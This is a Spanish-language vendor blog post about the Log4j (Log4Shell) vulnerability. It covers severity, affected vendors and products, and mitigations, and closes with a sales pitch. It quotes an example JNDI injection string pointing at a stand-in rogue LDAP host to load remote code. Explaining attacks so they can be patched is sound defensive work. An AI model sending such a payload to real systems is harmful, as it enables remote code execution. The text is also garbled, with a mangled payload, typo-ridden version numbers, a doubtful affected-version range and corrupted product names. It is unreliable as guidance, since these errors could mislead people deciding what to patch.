Lo que debes saber de la vulnerabilidad log4j

undefined-3

Log4j es una biblioteca de registro basada en Java que Ceky Gulcu desarrolló, luego se tranfierió a Apache Software Foundation y fue producida por ASF. Participa activamente en muchas aplicaciones Java mediante la creación de registros opcionales basados en la nube. 

¿Qué tan crítica es una vulnerabilidad detectada en Log4j ?

Imagen3

Las autoridades han determinado que el nivel de criticidad de la vulnerabilidad (CVSS) es 10 de 10. La alta puntuación CVSS sugiere que la vulnerabilidad debe corregirse de inmediato. Si está utilizando alguna de las versiones de log43aj de la 2.o a la 2.12.1, está siendo afectado por esta vulnerabilidad. 

¿Cómo funciona?

La forma en que el procesador log4j maneja los mensajes de registro es la causa principal de la vulnerabilidad. Un atacante puede ejecutar código de forma remota enviando un mensaje personalizado que puede incluir código malicioso como el siguiente:

${indi:1dap://rogueldapserver.com/a

Esta inserción de código da como resultado la carga de una clase de código externo o una búsqueda de mensajes y la ejecución de ese código.

undefined-1

¿Qué productos y sistemas pueden verse afectados por esta vulnerabilidad?

Algunos servicios/fabricantes afcetados por la vulnerabilidad de Log4j:

  • Apple 
  • Steam 
  • Twitter 
  • Baidu
  • Tesla
  • Amazon 

Productos identificados como afectados por la vulnerabilidad de Log4j:

  • La mayoría de las aplicaciones que utilizan Java en su infraestructura 
  • Apache Struts
  • Apache Struts 2 
  • Apache Tomcat 
  • Apache Spark 
  • Apache Solr
  • Apache Druida 
  • Apache Flink
  • Elastic Search 
  • Canal artificial 
  • Apache Dubbo 
  • Logstahs
  • Kafka
  • IBM Oradar SIEM
  • VMWare
  • NetApp
    Los siguientes fabricantes son las nuevas incorporaciones a la lista 
  • Cisco , F5 
  • Citrix
  • Carbon Black 
  • Imperva 
  • Jenkins
  • McAfee
  • Oracle
  • Webex
  • Palo-Alto Networks 
  • Pulse Secure 

La lista de aplicaciones y componentes afectados también esta en aumento

Hay varias formas de protegerse contra la vulnerabilidad de log4j. En primer lugar, actualice a la nueva versión, la versión 2.15.0. Si no puede actualizar por algún motivo, ASF recomienda las siguientes soluciones intermedias:

a)Los usuarios de Log4j versión 2.10 o superior pueden agregar como una opción de línea de comandos o agregue log4j. formatMsgNoLookups = true a un archivo log4j2.component.properties en la ruta de clase para evitar búsquedas en los mensajes de eventos de registro.

-Dlog4j.formatMsgNoLookups=true

b) Los usuarios desde Log4j 2.7 pueden especificar% m {nolookups} en la configuración de PatternLayout para evitar búsquedas en los mensajes de eventos de registro.
c) Elimine las clases JndiLookup y JndiManager del jar log4j-core. La eliminación de JndiManager hará que JndiContextSelector y JMSAppender dejen de funcionar.
d) Adquirir soluciones que te permitan obtener un análisis completo del perímetro del cual puede ser víctima de ciber ataques tu organización.

 

logo Soc

Ofrece análisis completo para detectar la vulnerabilidad de log4j en tus sistemas y cualquier tipo de brechas en ciberseguridad en distintos niveles de la Red.

Para conocer más acerca de esta solución

logo HD página

¡Contáctanos!

55 2455 5524

Deja Tu comentario